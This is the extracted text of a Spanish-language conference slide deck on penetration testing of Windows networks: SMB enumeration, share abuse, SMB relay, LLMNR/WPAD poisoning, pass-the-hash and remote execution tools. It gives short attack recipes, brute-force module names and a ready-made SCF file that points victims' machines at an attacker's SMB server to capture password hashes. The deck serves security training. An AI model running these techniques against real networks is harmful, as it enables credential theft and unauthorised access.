54
PWNEANDO REDES INFORMÁTICAS EN UN DÍA

CPMX7 Pwneando redes informáticas por Paulino Calderon

Embed Size (px)

Citation preview

Page 1: CPMX7 Pwneando redes informáticas por Paulino Calderon

PWNEANDO REDES INFORMÁTICAS EN UN DÍA

Page 2: CPMX7 Pwneando redes informáticas por Paulino Calderon

#CAT /ETC/ABOUT

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM

Page 3: CPMX7 Pwneando redes informáticas por Paulino Calderon
Page 4: CPMX7 Pwneando redes informáticas por Paulino Calderon

COSAS QUE HE APRENDIDO

• 99% DE LA VECES SERÁN REDES WINDOWS.• SE DESCONOCEN LAS VULNERABILIDADES MÁS

CRÍTICAS QUE AFECTAN A UNA ORGANIZACIÓN HASTA QUE CONTRATAN UN SERVICIO PROFESIONAL.

• NADIE SABE QUE CORRE EN SUS MÁQUINAS.• LO BARATO/RÁPIDO SALE CARO (LAS

CONFIGURACIONES DEFAULT SON MORTALES).

Page 5: CPMX7 Pwneando redes informáticas por Paulino Calderon

SMB3.0 3.02

1.02.0

2.1

Page 6: CPMX7 Pwneando redes informáticas por Paulino Calderon
Page 7: CPMX7 Pwneando redes informáticas por Paulino Calderon

SMB ES NUESTRO AMIGO

SMB ES UNO DE LOS PRINCIPALES VECTORES DE ATAQUE EN AMBIENTES WINDOWS.

GRACIAS A SMB:• OBTENER INFORMACIÓN SOBRE EL SISTEMA OPERATIVO Y DIRECTORIO ACTIVO• ROBAR CREDENCIALES DE USUARIOS• ACCEDER A CARPETAS COMPARTIDAS • PROBAR CREDENCIALES QUE OBTENGAMOS• EJECUTAR COMANDOS O BINARIOS REMOTAMENTE (PSEXEC, WMI,

POWERSHELL…)• EXISTEN MUCHAS VULNERABILIDADES EN IMPLEMENTACIONES DE SERVIDORES Y

CLIENTES…

Page 8: CPMX7 Pwneando redes informáticas por Paulino Calderon

CONTROLADORES DE DOMINIO• ES MUY COMÚN QUE LOS CONTROLADORES DE

DOMINIO PERMITAN SESIONES NULAS SOBRE SMB.• LA INFORMACIÓN QUE REVELA ESTA MALA

CONFIGURACIÓN INCLUYE USUARIOS Y GRUPOS DE DOMINIO.

• GRACIAS A ESTA VULNERABILIDAD SE PUEDE ENFOCAR EL ATAQUE EN CIERTOS USUARIOS CON PRIVILEGIOS MÁXIMOS…

Page 9: CPMX7 Pwneando redes informáticas por Paulino Calderon

OBTENIENDO INFORMACIÓN DE CONTROLADORES DE DOMINIO

LINUXENUM 0.9 GUARDA USUARIOS EN ARCHIVOS DE TEXTO DIVIDIDO POR GRUPOS. PUEDE SER USADO DIRECTAMENTE EN HERRAMIENTAS COMO NMAP O METASPLOIT.DESCARGA DESDE HTTPS://GITHUB.COM/CLDRN/ENUM4LINUX-0.9

Page 10: CPMX7 Pwneando redes informáticas por Paulino Calderon

DOMINIO\USUARIO

Page 11: CPMX7 Pwneando redes informáticas por Paulino Calderon

OBTENIENDO INFORMACIÓN DE CONTROLADORES DE DOMINIOPOLENUMOBTIENE LAS POLÍTICAS DE CONTRASEÑAS DE UNA MAQUINA.

DESCARGA DESDE HTTPS://LABS.PORTCULLIS.CO.UK/TOOLS/POLENUM/

Page 12: CPMX7 Pwneando redes informáticas por Paulino Calderon

“QUICKPWN”

• IDENTIFICAR DCS• EJECUTAR ENUM4LINUX 0.9$ENUM4LINUX –A <IP>• EJECUTAR POLENUM PARA OBTENER POLITICAS DE

CONTRASEÑAS Y BLOQUEO DE CUENTASPOLENUM <IP>• EJECUTAR ATAQUE DE DICCIONARIO UTILIZANDO LA LISTA DE

USUARIOS OBTENIDAMETASPLOIT: AUXILIARY/SCANNER/SMB/SMB_LOGINNMAP: SMB-BRUTE

Page 13: CPMX7 Pwneando redes informáticas por Paulino Calderon

CARPETAS COMPARTIDAS

• HABILITADAS PARA FACILITAR LA TRANSFERENCIA DE ARCHIVOS DENTRO DE LA ORGANIZACIÓN.

• ES POSIBLE ENCONTRAR INFORMACIÓN CONFIDENCIAL EN CARPETAS COMPARTIDAS.

Page 14: CPMX7 Pwneando redes informáticas por Paulino Calderon

“QUICKPWN”

• ENCUENTRA INFORMACIÓN RELACIONADA CON CONTRASEÑAS EN ARCHIVOS ALMACENADOS EN CARPETAS COMPARTIDAS:

HERRAMIENTA: FILE LOCATOR LITE O PRO (WWW.MYTHICSOFT.COM)

Page 15: CPMX7 Pwneando redes informáticas por Paulino Calderon

ROBO DE CREDENCIALES DE USUARIOS

• DIFERENTES TÉCNICAS PUEDEN SER UTILIZADAS PARA EL ROBO DE CREDENCIALES ABUSANDO LAS CARPETAS COMPARTIDAS.

• NO HAY PARCHE (VULNERABILIDAD POR DISEÑO).

Page 16: CPMX7 Pwneando redes informáticas por Paulino Calderon

EL CLÁSICO

ES SENCILLO LEVANTAR UN SERVIDOR SMB Y ESPERAR A QUE LOS USUARIOS QUE NOS MANDEN SU NOMBRE DE USUARIO, CONTRASEÑA CIFRADA Y DOMINIO.

Page 17: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 18: CPMX7 Pwneando redes informáticas por Paulino Calderon

¿QUIÉN TIENE EL TIEMPO PARA ESPERAR A QUE ALGUIEN O ALGO SE CONECTE A NOSOTROS?

Page 19: CPMX7 Pwneando redes informáticas por Paulino Calderon

RUTAS UNC

\\<EQUIPO>\<CARPETA>\<ARCHIVO>

Page 20: CPMX7 Pwneando redes informáticas por Paulino Calderon

¿DÓNDE PODEMOS USAR RUTAS UNC?

• APLICACIONES WEB/SHAREPOINT/TU PROPIO SERVIDOR WEB• SENTENCIAS SQL• DOCUMENTOS DE OFFICE• LMHOSTS.SAM <- PUEDES USARLO PARA CARGAR TU ARCHIVO HOSTS

MALICIOSO (PROTIP)• ARCHIVOS LNK• ARCHIVOS SCF <- MÁS FÁCILES QUE CREAR QUE LOS LNK (PROTIP)

Page 21: CPMX7 Pwneando redes informáticas por Paulino Calderon

“QUICKPWN”

• ENCUENTRA ALGUNA CARPETA COMPARTIDA EN LA QUE TENGAS PRIVILEGIOS DE ESCRITURA

• SUBE UN ARCHIVO QUE CONTENGA UNA RUTA UNC APUNTANDO A TU SERVIDOR SMB

• ESPERA LAS CREDENCIALES…

Page 22: CPMX7 Pwneando redes informáticas por Paulino Calderon

ARCHIVOS SCF (PRO TIP)

[SHELL]COMMAND=2ICONFILE=\\<MI IP>\SHARE\PWN.ICO[TASKBAR]COMMAND=TOGGLEDESKTOP

Page 23: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 24: CPMX7 Pwneando redes informáticas por Paulino Calderon

ATAQUES SMB RELAY

SI EL FIRMADO DE MENSAJES SMB ESTA DESHABILITADO, ES POSIBLE REALIZAR ATAQUES DE RELAY.

EL 99.9% DE LOS CASOS EN EQUIPOS DE TRABAJO ES VULNERABLE. (CONFIGURACIÓN DEFAULT EN WINDOWS)

Page 25: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 26: CPMX7 Pwneando redes informáticas por Paulino Calderon
Page 27: CPMX7 Pwneando redes informáticas por Paulino Calderon

“QUICKPWN”

• ENCUENTRA ALGUNA CARPETA COMPARTIDA EN LA QUE TENGAS PRIVILEGIOS DE ESCRITURA

• SUBE UN ARCHIVO QUE CONTENGA UNA RUTA UNC APUNTANDO A TU SERVIDOR SMB

• UTILIZA SMBRELAYX.PY PARA REDIRIGIR EL INTENTO DE CONEXIÓN A TU VÍCTIMA

Page 28: CPMX7 Pwneando redes informáticas por Paulino Calderon

¿SE PUEDE FORZAR A USUARIOS A CONECTARSE A NOSOTROS?

• YA VIMOS DIFERENTES MÉTODOS PARA RECIBIR CREDENCIALES VALIDAS PERO SE NECESITABA:• QUE USUARIOS SE CONECTEN A NOSOTROS• ACCESO DE ESCRITURA A UNA CARPETA COMPARTIDA

¿SE PUEDEN UTILIZAR TÉCNICAS DE POISONING PARA FORZAR A QUE LOS USUARIOS SE CONECTEN A NOSOTROS?

Page 29: CPMX7 Pwneando redes informáticas por Paulino Calderon

WPAD GRACIAS POR EXISTIR

• HABILITADO POR DEFAULT EN TODOS LOS EQUIPOS MICROSOFT WINDOWS

• DISEÑADO PARA AUTO-CONFIGURAR EL PROXY DE CLIENTES…

• OPCIONES DE INTERNET>LAN SETTINGS>AUTOMATICALLY DETECT SETTINGS

Page 30: CPMX7 Pwneando redes informáticas por Paulino Calderon

LLMNR Y NBT-NS

• PROTOCOLOS HABILITADO EN LA MAYORÍA DE EQUIPOS WINDOWS PARA AYUDAR CON LA RESOLUCIÓN DE NOMBRES.

• LLMNR (LINK-LOCAL MULTICAST NAME RESOLUTION) <-A PARTIR DE WINDOWS VISTA

• NBT-NS (NETBIOS NAME SERVICE)• PERMITIDOS EN MUCHOS AMBIENTES

RESTRINGIDOS. <-PROTIP

Page 31: CPMX7 Pwneando redes informáticas por Paulino Calderon

“QUICKPWN”

• DETECTA PETICIONES WPAD/LLMNR/NBT-NS EN LA RED• LEVANTA UN SERVICIO SMB PARA CAPTURAR LAS

CREDENCIALES• FORZA A USUARIOS A CONECTARSE A TÍ A TRAVÉS DE

ATAQUES DE ENVENENAMIENTO DE RECURSOS QUE SI SOLICITARON

• CAPTURA LOS HASHES

Page 32: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 33: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 34: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 35: CPMX7 Pwneando redes informáticas por Paulino Calderon
Page 36: CPMX7 Pwneando redes informáticas por Paulino Calderon

EL INVENCIBLE: PASS THE HASH

• LLEVA CASI 20 AÑOS EXISTIENDO. EXISTEN YA MITIGACIONES EN SISTEMAS MODERNOS PERO NO SIEMPRE SALEN BIEN LAS COSAS…

• MUCHOS PROTOCOLOS DE WINDOWS REQUIEREN CONOCER EL HASH DE LA CONTRASEÑA PERO NO LA CONTRASEÑA EN SÍ PARA AUTENTICARSE.

• MUCHAS HERRAMIENTAS LO SOPORTAN:• PTH-WINEXE, MIMIKATZ,• METASPLOIT: PSEXEC_COMMAND, PSEXEC

Page 37: CPMX7 Pwneando redes informáticas por Paulino Calderon

PTH CONTRA RDP

MICROSOFT INTRODUJO EL MODO “RESTRICTED ADMIN”, GRACIAS A ESTE MODO, AHORA ES POSIBLE UTILIZAR PTH CONTRA RDP EN WINDOWS 2012 R2 Y WINDOWS 8.1. (SOLO ADMININISTRADORES)

Page 38: CPMX7 Pwneando redes informáticas por Paulino Calderon

CONOZCAN A PSEXEC

• NOS AYUDA A IDENTIFICAR SISTEMAS QUE RE UTILICEN CONTRASEÑAS.

• SIRVE PARA EJECUTAR COMANDOS O EJECUTABLES EN MÁQUINAS A LAS QUE TENGAMOS ACCESO.

• OJO: ES MUY RUIDOSO.

Page 39: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 40: CPMX7 Pwneando redes informáticas por Paulino Calderon

WDIGEST

• SISTEMA DE AUTENTICACIÓN AUTOMÁTICA QUE REQUIERE QUE WINDOWS ALMACENE LA VERSIÓN EN TEXTO PLANO DE LA CONTRASEÑA.

• WCE, MIMIKATZ FTW

Page 41: CPMX7 Pwneando redes informáticas por Paulino Calderon

CREDMAP – THE CREDENTIAL MAPPER

DESARROLLADO POR ROBERTO SALGADO DE WEBSEC PARA VERIFICAR CREDENCIALES EN SERVICIOS COMO REDES SOCIALES Y SITIOS WEB

DESCARGA: HTTPS://GITHUB.COM/LIGHTOS/CREDMAP

Page 42: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 43: CPMX7 Pwneando redes informáticas por Paulino Calderon

WMI

• ALTERNATIVA DE PSEXEC• NO LEVANTA UN SERVICIO • NO TOCA EL DISCO DURO• EN KALI: WMIEXEC Y PTH-WMIS

Page 44: CPMX7 Pwneando redes informáticas por Paulino Calderon

PENTESTERS AMAN POWERSHELL

POWERSHELL PUEDE SER UTILIZADO PARA EJECUCIÓN DE CÓDIGO REMOTAMENTE, RECONOCIMIENTO DE LA RED, Y HASTA ESCALACIÓN DE PRIVILEGIOS.

PROYECTOS QUE VALE LA PENA MENCIONAR:• POWERSPLOIT: COLECCIÓN DE MÓDULOS UTILES PARA PENTESTING.

HTTPS://GITHUB.COM/POWERSHELLMAFIA/POWERSPLOIT/• EMPIRE: AGENTE PARA POST-EXPLOTACIÓN

HTTP://WWW.POWERSHELLEMPIRE.COM

Page 45: CPMX7 Pwneando redes informáticas por Paulino Calderon

SMB1 VS SMB2 VS SMB3

• LA MAYORÍA DE HERRAMIENTAS DE EXPLOTACIÓN REQUIEREN SMB1. (POR AHORA)

• SMB2 REDUCE EL SET DE FUNCIONES• SMB3 INCLUYE CIFRADO DE MENSAJES.

Page 46: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 47: CPMX7 Pwneando redes informáticas por Paulino Calderon

OTROS “QUICKPWNS”

• GOLDEN TICKET KERBEROS• SOFTWARE DESACTUALIZADO• SERVICIOS CON PERMISOS EXCESIVOS• IMPRESORAS MULTIFUNCIONALES• AMBIENTES DE DESARROLLO CONFIGURADOS INCORRECTAMENTE• SISTEMAS DE ACTUALIZACIONES INSEGUROS (*)

Page 48: CPMX7 Pwneando redes informáticas por Paulino Calderon

VIDEO

Page 49: CPMX7 Pwneando redes informáticas por Paulino Calderon

¿QUÉ OTRAS VULNERABILIDADES VALE LA PENA MENCIONAR?

Page 50: CPMX7 Pwneando redes informáticas por Paulino Calderon

SPAM

Page 51: CPMX7 Pwneando redes informáticas por Paulino Calderon

OWASP RIVIERA MAYA

Page 52: CPMX7 Pwneando redes informáticas por Paulino Calderon

NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION

Page 53: CPMX7 Pwneando redes informáticas por Paulino Calderon

CANALES OFICIALES DE WEBSEC

• WWW: WWW.WEBSEC.MX• YOUTUBE: YOUTUBE.COM/WEBSECMX• FACEBOOK: WEBSEC.MX• TWITTER: @_WEBSEC

Page 54: CPMX7 Pwneando redes informáticas por Paulino Calderon

CONTACTO

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM